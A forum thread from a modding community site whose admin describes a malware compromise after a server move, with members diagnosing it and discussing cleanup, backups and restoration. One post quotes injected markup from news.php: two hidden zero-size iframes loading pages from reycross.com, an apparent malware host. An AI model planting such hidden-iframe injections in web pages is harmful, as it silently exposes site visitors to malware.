[achtung]

Hey folks, thought it might be a good idea to chime in and let everyone know what's going on.

My host recently decided to move my sites to another server on a whim.  The old servers were 32-bit, the new ones are 64-bit, and are running a different version of PHP.  This move broke all of my sites that used a modified php.ini horribly, and I had to go fix them all.  Somewhere in this mess, somebody managed to upload two .html files that redirected to reycross, which I assume is a malware distribution site.  One was uploaded as an avatar, and another as an upload into the public uploads section.

I have removed the offending files and requested a review of the site from Google.  Hopefully this will fix the issue Firefox and Chrome users are having.  I also plan to look into how exactly the files got there, and from where.

In a day or two it should be fine again.

Sorry.  =/

[BengalTiger]

So that means I don't have to write about the virus that keeps me from entering the site (antivirus blocks the connection).

Not the best way to resume work on TotT after the summer break...

[Herra Tohtori]

Oh well, google is innocent after all... However, immediately after the google ad javascript, there's the following entry in news.php:

Code: [Select]

<iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></td></tr></table><table style='width:100%' cellspacing='3'><tr><td style='width:20%;'></td><td style='width:60%;'><img src='/e107_themes/e107v4a/images/blank.gif' width='1' height='1' alt='' /></td><td style='width:20%;'></td></tr><tr><td style='width:20%; vertical-align: top;'>

Which I believe is what is initiating the virus intrusion attempts. It's still in the page source, so as things are Google will keep detecting the site as a malware site; removing all references to reycross.com recursively from all pages on the site should do the trick.

[blowfish]

Funny ... there was a similar malware insertion (hidden frame) in the Earth Defense website, which somehow kept reappearing, a while ago.  It went away after I changed the infrastructure of the page but how it got there in the first place, and why it kept reappearing, both remain a mystery.

[BengalTiger]

...but how it got there in the first place, and why it kept reappearing, both remain a mystery.

[achtung]

It's starting to look like it may be more work than it's worth to clean up fully.

Does anyone here hate Joomla?

[Akalabeth Angel]

It's starting to look like it may be more work than it's worth to clean up fully.

You have a backup or something to revert to?

[achtung]

It's starting to look like it may be more work than it's worth to clean up fully.

You have a backup or something to revert to?

All downloads and screenshots are backed up on my machine and my host's server.  All I need to do, if I choose to keep e107, is backup the MySQL database, reinstall e107, and then put everything in place like it never happened.  That's how simple it *SHOULD* be.  I'm a strong believer in Murphy's Law though.

[BengalTiger]

So the forums and threads aren't backed up?

[achtung]

So the forums and threads aren't backed up?

They are.

I probably should have mentioned that.

[sigtau]

Luckily the subdomains to fsmods didn't get hit. :/

[Fury]

Does anyone here hate Joomla?

Joomla has terrible security history. Granted, most problems are caused by 3rd party addons/plugins rather than the core package. But still.

[BengalTiger]

So the forums and threads aren't backed up?

They are.

I probably should have mentioned that.

Good. It would take me weeks to recall and rewrite the storyline for TotT.

However as soon as the forum's up I'll save the storyline thread on my HDD to have a backup.

[achtung]

Main site and files restored.  Forums restored.  User registration disabled.  File upload disabled.  Screenshots for downloads are backed up, but not restored.

This is temporary.  There will be a replacement coming soon.

[chief1983]

Glad it's back in some level of operation.

[TopAce]

I still can't download anything.

* TopAce is waiting patiently.

[achtung]

Sorry, that's been fixed.  Everything was extracted to the wrong directory.

[TopAce]

What's up with the uploading business? I cannot see an "upload" button anywhere (except the upload large file one which returns a 404 message), but I see that the 158th have uploaded Exposition.

[FUBAR-BDHR]

Main site and files restored.  Forums restored.  User registration disabled.  File upload disabled.  Screenshots for downloads are backed up, but not restored.

This is temporary.  There will be a replacement coming soon.

That would be my guess.

[achtung]

What's up with the uploading business? I cannot see an "upload" button anywhere (except the upload large file one which returns a 404 message), but I see that the 158th have uploaded Exposition.

If you need something uploaded just shoot me a link and I'll gladly add it.  I'm just trying to avoid too many things being added, as I'm not finding any good solutions for transferring the old database of downloads to a new CMS.  I may have to do it all by hand.